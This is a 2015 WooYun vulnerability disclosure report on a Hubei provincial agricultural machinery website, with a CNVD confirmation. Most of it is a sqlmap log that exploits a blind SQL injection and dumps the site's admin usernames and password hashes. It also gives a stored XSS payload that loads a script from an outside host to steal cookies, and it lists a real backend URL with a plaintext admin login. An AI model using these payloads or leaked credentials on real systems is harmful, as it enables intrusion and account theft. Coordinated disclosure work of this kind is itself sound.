乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-02: 细节已通知厂商并且等待厂商处理中 2015-03-06: 厂商已经确认,细节仅向厂商公开 2015-03-16: 细节向核心白帽子及相关领域专家公开 2015-03-26: 细节向普通白帽子公开 2015-04-05: 细节向实习白帽子公开 2015-04-16: 细节向公众公开
湖北省农机安全监理推广信息网存储型XSS+SQL注入(已打Cookies)
sql+xss
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: classId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: classId=103 AND 6332=6332---[10:47:53] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[10:47:53] [ERROR] cannot retrieve column names, back-end DBMS is Access[10:47:53] [INFO] fetching entries of column(s) 'classid, id, orderid, password, setting, username, usernmae' for table 'admin' in database 'Microsoft_Access_masterdb'[10:47:53] [INFO] fetching number of column(s) 'classid, id, orderid, password,setting, username, usernmae' entries for table 'admin' in database 'Microsoft_Access_masterdb'[10:47:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[10:47:53] [INFO] retrieved:[10:47:54] [WARNING] reflective value(s) found and filtering out3[10:47:55] [INFO] heuristics detected web page charset 'GB2312'[10:47:55] [INFO] fetching number of distinct values for column 'id'[10:47:55] [INFO] retrieved: 3[10:47:57] [INFO] using column 'id' as a pivot for retrieving row data[10:47:57] [INFO] retrieved: 1[10:48:01] [INFO] retrieved: 103[10:48:12] [INFO] retrieved: 4[10:48:16] [INFO] retrieved: 0[10:48:19] [INFO] retrieved: e583273c626a4876[10:49:01] [INFO] retrieved:[10:49:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requesthubeinongji[10:49:52] [INFO] retrieved:[10:49:53] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'[10:49:53] [INFO] retrieved: 3[10:49:57] [INFO] retrieved: 103[10:50:05] [INFO] retrieved: 4[10:50:09] [INFO] retrieved: 0[10:50:12] [INFO] retrieved: 7a57a5a743894a0e[10:51:03] [INFO] retrieved: fitdoing[10:51:25] [INFO] retrieved:[10:51:26] [INFO] retrieved: 4[10:51:29] [INFO] retrieved: 103[10:51:38] [INFO] retrieved: 4[10:51:42] [INFO] retrieved: 0[10:51:45] [INFO] retrieved: 39776a07e1c3a922[10:52:30] [INFO] retrieved: hbnj[10:52:42] [INFO] retrieved:[10:52:43] [INFO] analyzing table dump for possible password hashesrecognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [y/N/q] NDatabase: Microsoft_Access_masterdbTable: admin[3 entries]+----+---------+---------+---------+----------+-------------+------------------+| id | classid | orderid | setting | usernmae | username | password |+----+---------+---------+---------+----------+-------------+------------------+| 1 | 103 | 4 | 0 | <blank> | hubeinongji | e583273c626a4876 || 3 | 103 | 4 | 0 | <blank> | fitdoing | 7a57a5a743894a0e || 4 | 103 | 4 | 0 | <blank> | hbnj | 39776a07e1c3a922 |+----+---------+---------+---------+----------+-------------+------------------+[10:53:31] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file 'F:\SqlMap\Bin\output\www.hbnjjl.gov.cn\dump\Microsoft_Access_masterdb\admin.csv'[10:53:31] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 784 times[10:53:31] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\www.hbnjjl.gov.cn'
注入点:http://www.hbnjjl.gov.cn/listDirect.asp?classId=102asp+access 没啥可说的。主要还是那啥。有个站长信箱。
搜索过滤了<..这里居然啥都没过滤.邪恶了 - -
</div><script>alert("wooyun")</script>
</textarea>'"><script src=http://webxss.net/A6JnLp?1425178565></script>
在上面已经拿到了后台账号密码。。直接进去看看。。后台:http://www.hbnjjl.gov.cn/adminManage/username:fitdoing password:admin
找到站长信箱!
cookies也收到了。
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-03-06 17:32
CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。
暂无